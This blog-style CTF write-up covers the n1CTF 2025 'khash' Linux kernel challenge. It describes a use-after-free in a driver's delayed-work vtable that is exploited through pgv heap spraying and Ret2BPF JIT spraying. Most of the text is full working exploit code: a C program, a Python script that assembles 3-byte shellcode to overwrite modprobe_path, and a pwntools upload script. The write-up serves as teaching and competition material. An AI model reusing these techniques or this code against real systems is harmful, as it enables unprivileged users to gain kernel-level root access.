2025-11-02发表2025-11-03更新WriteUp17 分钟读完 (大约2522个字)

Use BPFJIT to solve khash from n1CTF 2025

Exploit a kernel UAF without leaking any address.

In short…

N1khash has delayed work UAF, which contains a vtable.
We do pgv spray to reclaim the UAF slot in kmalloc-256.
We setup pgv content as (0xffffffffc1000000 - 0x800), which is basically a kernel one-gadget in our sprayed BPF JITed code.
Wait for the delayed work been executed and wins, no need to do any leak.

The vulnerability

When opening /dev/khash, the module allocates a control structure in kmalloc-256 without any isolation:

The khash can schedule delayed work, when the work is executed, it will invoke two functions from vtable inside the control structure:
(Both vtable[0] and vtable[1] will be called)

To queue a delayed, we can use 0x4010B110 ioctl:

If we close the fd before the delayed work is executed, the control structure will be freed and when the work is executed, it will get vtable from a freed kmalloc-256 chunk.

Exploit plan

From now on, we can already gain two free Control-Flow-Hijack primitives.

I have discussed what can we do with a pure CFH at my previous writeup about corCTF, but most of them at least require an kernel .text leak to perform ROP (panic_on_oops disable, RetSpill, NPerm or regular stack pivoting).

However this challenge has not enable kvm when booting the kernel, so it’s not trivial to bypass KASLR with hardware side channel.

We may certainly reverse the khash module more and see if there is any good info leak, but I decided to use Ret2BPF directly which does not require any info leak.

Thanks to the challenge author who provided the Kconfig so that we can quickly check BPF_JIT is enabled (which is so nice that we do not need to guess the kernel config once and once again).
And we can also see STATIC_USERMODE_HELPER is not set so our shellcode can be much simpler with just modifying modprobe_path or core_pattern instead of performing a ret2usr or task_struct search.

Also please note that unprivileged_bpf_disabled is not relevant with the cBPF spray in Ret2BPF, so we do not need to care about it.

Exploit! Exploit! Exploit!

Before we actually went to CFH, we need to prepare a structure belongs to kmalloc-256 which at 0x28 offset is a data pointer that the data it points to will be controlled by us.

I choose pgv array as a good candidate, since it will be a elastic array which every element is a pointer points to a shared memory which fully controlled by user.

1
2
3

struct pgv {
	char *buffer;  // points to a kernel-user shared memory
};  // allocated as array with GFP_KERNEL

By using pgv[32] to reclaim freed khash control structure, we can setup the vtable and control the function pointer without any info leak.

Then the only thing left is to spray our cBPF program to get a JITed native code area, the allocation address of BPF JITed code is highly predictable and if we spray enough (0x600 programs with 0x900 length each in this exploit).

By simply setting the function pointer to 0xffffffffc1000000 - 0x800, we can jump to the middle of our sprayed BPF JITed code.

You can find more details about Ret2BPF in the original writeup and recent discussion.

Since x86 is Variable-Length Instruction Set Architecture, we can spray LOAD CONSTANT instructions to load arbitrary 32-bit constant (without BPFJIT hardening). We can certainly jump to the middle of those 32-bit constants to trick CPU to interpret them as our shellcode.

The original Ret2BPF use 0xb3909090 as nop sled, so that the LOAD CONSTANT instruction 0xb8xxxxxx : (mov eax, 0xxxxxxxxx) can be interpreted as .. 90 b8 b3 90 90 90 (b8 b3 : mov bl).

At the end of the sled, we can place our 3-byte length shellcodes to do the actual privilege escalation.

So the main logic of exploit is:

int main() {
  init();

  bpf_jit_spray();  // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
  puts("BPF JIT spray done.");

  if (fork() == 0) {  // setup ns and ready for pgv spray
    spray_pgv_thread();
  }

  int dev = open(DEV_PATH, O_RDWR | O_CLOEXEC);
  uint8_t buf[0x100];
  memset(buf, 0x41, sizeof(buf));

  struct kh_queue_req req = {
      .digest_ptr = (uint64_t)(uintptr_t)buf,
      .count = ((uint64_t)1000 << 32) | 0x100
  };
  SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

  close(dev);  // free the control block 
  write(cmd_pipe_req[1], void_buf, 1);  // reclaim it with pgv[32] array
  read(cmd_pipe_reply[0], void_buf, 1);
  puts("pgv spray done");

  while (check_modprobe() == 0)
    sleep(1);
  puts("Win !!");
  system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/2\n/bin/chmod 777 /tmp/2\n'>/tmp/1");
  system("chmod +x /tmp/1");
  socket(AF_INET, SOCK_STREAM, 132);
  system("cat /tmp/2");
}

The full exploit code can be found at the end of this writeup.

Misc notes

modprobe_path

This commit at about Linux 6.2 removed usage of binfmt so that executing a unknown binary format will not invoke modprobe anymore. But we can still use some unprivileged syscall to force kernel load more kernel modules (which is compiled but not loaded by default), such as:

1	socket(AF_INET, SOCK_STREAM, 132);

This trick is also been discussed and well studied in SyzBridge.

Shellcode

The original copy_from_user shellcode is good enough, but if we want to perform more complex operations in the shellcode, we can disable the WP bit and copy shellcode from user memory to kernel executable memory and then jump to it.

End of the Trail

After all those merciless 48h CTF events, it’s sweet to have a 24h CTF and enjoy the rest of weekend at beach 🥰

Full exploit code

#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/timerfd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define SYSCHK(x)                 \
  ({                              \
    typeof(x) __res = (x);        \
    if (__res == (typeof(x))-1)   \
      err(1, "SYSCHK(" #x ")");   \
    __res;                        \
  })

/* =========================== pgv spray ===========================  */
#include <sys/socket.h>
#include <net/if.h>
#include <netpacket/packet.h>  
#include <net/ethernet.h> 
#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8)
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create an isolate namespace for pgv */
void unshare_setup(void) {
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

struct tpacket_req3 {
	unsigned int	tp_block_size;	/* Minimal size of contiguous block */
	unsigned int	tp_block_nr;	/* Number of blocks */
	unsigned int	tp_frame_size;	/* Size of frame */
	unsigned int	tp_frame_nr;	/* Total number of frames */
	unsigned int	tp_retire_blk_tov; /* timeout in msecs */
	unsigned int	tp_sizeof_priv; /* offset to private data area */
	unsigned int	tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);
    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
    return s;
}

char void_buf[1] = {0};
void spray_pgv_thread() {
  unshare_setup();
  read(cmd_pipe_req[0], void_buf, 1); 
  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
        pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
  }

  for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
    if (!pgfd[i])
        continue;
    pgaddr[i] = mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, pgfd[i], 0);
    for (int j = 0; j < PAGE_NUM; j++) {
        unsigned long *pgv_buff = pgaddr[i] + j * 0x1000;
        pgv_buff[0] = 0xffffffffc1000000 - 0x800;
    }
  }
  write(cmd_pipe_reply[1], void_buf, 1);
  
  sleep(999);
  exit(0);
}
/* =========================== pgv spray ===========================  */

/* ========================= BPF JIT spray =========================  */
struct sock_filter filter[0x1000];
char buf[0x1000];
int bpf_jit_spray(void) {
  
  char *shellcode = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE | 
                                  PROT_EXEC, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
  strcpy(shellcode, "/tmp/1");

  int stopfd[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));
  
  unsigned int prog_len = 0x900;  // In current environment, the max instructions in a program is near 0x900
  struct sock_filter table[] = {
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},  // 0xb3909090 is NOPsled shellclode to make exploitation more reliable (b3 b8    mov    bl, 0xb8)
    {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}
  };

  for (int i = 0; i < prog_len; i++) {
    filter[i] = table[0];
  }

  filter[prog_len - 1] = table[1];
  int idx = prog_len - 2;

#include "sc.h"

  struct sock_fprog prog = {
    .len = prog_len,
    .filter = filter,
  };
  
  int fd[2];
  int fork_limit = 0x30;
  for (int k = 0; k < fork_limit; k++) {
    if (fork() == 0) {
      close(stopfd[1]);  // use fork to bypass RLIMIT_NOFILE limit.
      for (int i = 0; i < 0x20; i++) {
        SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
        SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
      }
      write(stopfd[0], buf, 1);
      read(stopfd[0], buf, 1);
      exit(0);
    }
  }
  read(stopfd[1], buf, fork_limit); /* wait for all forks to finish spraying BPF code */
}

int check_modprobe() {
  char buf[0x100] = {};
  int modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
  read(modprobe, buf, sizeof(buf));
  printf("modprobe: %20s\n", buf);
  close(modprobe);
  char* old = "/sbin/modprobe";
  return strncmp(buf, old, strlen(old)) != 0;
}
/* ========================= BPF JIT spray =========================  */

#define DEV_PATH "/dev/n1khash"
#define KH_IOCTL_QUEUE 0x4010B110

struct kh_queue_req {
  uint64_t digest_ptr; // user buffer pointer (if used by driver)
  uint64_t count;      // hi: delay (ms), lo: size (bytes, 16-byte aligned, <= 0x1000)
};

void init() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  pipe(cmd_pipe_req);
  pipe(cmd_pipe_reply);
  // pin_on_cpu(0);
  
  struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
  setrlimit(RLIMIT_NOFILE, &rlim);

  // Ignore SIGPIPE
  signal(SIGPIPE, SIG_IGN);
}

int main() {
  init();

  bpf_jit_spray();  // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
  puts("BPF JIT spray done.");

  if (fork() == 0) {  // setup ns and ready for pgv spray
    spray_pgv_thread();
  }

  int dev = open(DEV_PATH, O_RDWR | O_CLOEXEC);
  uint8_t buf[0x100];
  memset(buf, 0x41, sizeof(buf));

  struct kh_queue_req req = {
      .digest_ptr = (uint64_t)(uintptr_t)buf,
      .count = ((uint64_t)1000 << 32) | 0x100
  };
  SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

  close(dev);  // free the control block 
  write(cmd_pipe_req[1], void_buf, 1);  // reclaim it with pgv[32] array
  read(cmd_pipe_reply[0], void_buf, 1);
  puts("pgv spray done");

  while (check_modprobe() == 0)
    sleep(1);
  puts("Win !!");
  system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag\n' > /tmp/1");
  system("chmod +x /tmp/1");
  socket(AF_INET, SOCK_STREAM, 132);
  system("cat /tmp/flag");
}

Generate sc.h with the following python script:

#!/usr/bin/env python3

from pwn import *
import struct

entry_syscall = 0xffffffff82800080  # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val):  # reg is base reg, add / dec _val
    ins = ["sub", "add"]
    return f'''
xor esi,esi
mov sil, {(abs(_val) >> 24) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 16) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 8) & 0xff}
shl esi, 8
mov sil, {(abs(_val)) & 0xff}    
{ins[_val < 0]} {_reg}, rsi
'''


ASM = f"""
; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64; ECX should be MSR_LSTAR ( 0xc0000082 )
xor edx, edx    
mov cl, 0xc0    
shl ecx, 24    
mov cl, 0x82    
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32    
shl rdx, cl    
add rdx, rax  
; entry_SYSCALL_64 + offset = core_pattern
; move core_pattern to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx    
; call copy_from_user(core_pattern, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi    
mov sil, 0xa0    
shl esi, 16    
xor edx, edx    
mov dl, 0x30    
push rax
call rax
pop rax
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg )  
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep is better than jmp $+0


with open("sc.h", "w") as f:
    for a in ASM.strip().split("\n")[::-1]:
        if a.strip() == '' or a[0] == ';':
            continue
        cur = asm(a)
        assert len(cur) <= 3
        cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
        sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
        print(sc)
        f.write(sc + "\n")

Interactive with remote:

import os, base64, gzip
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/tmp"
SEP = b"bash-5.2$ "


os.system("python3 gen.py")
os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
    f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
    exp = base64.b64encode(f.read())

# p = remote("60.205.163.215", 42675)
p = process(['./run.sh'])

print(p.recvuntil(SEP).decode())
for i in range(0, len(exp), 0x200):
    p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
    p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
p.interactive()

Use BPFJIT to solve khash from n1CTF 2025

https://ghostfrankwu.github.io/2025/11/02/2025n1/

作者

Frank Wu

发布于

2025-11-02

更新于

2025-11-03

许可协议

Use BPFJIT to solve khash from n1CTF 2025

In short…

The vulnerability

Exploit plan

Exploit! Exploit! Exploit!

Misc notes

modprobe_path

Shellcode

End of the Trail

Full exploit code

作者

发布于

更新于

许可协议

链接

分类

最新文章

链接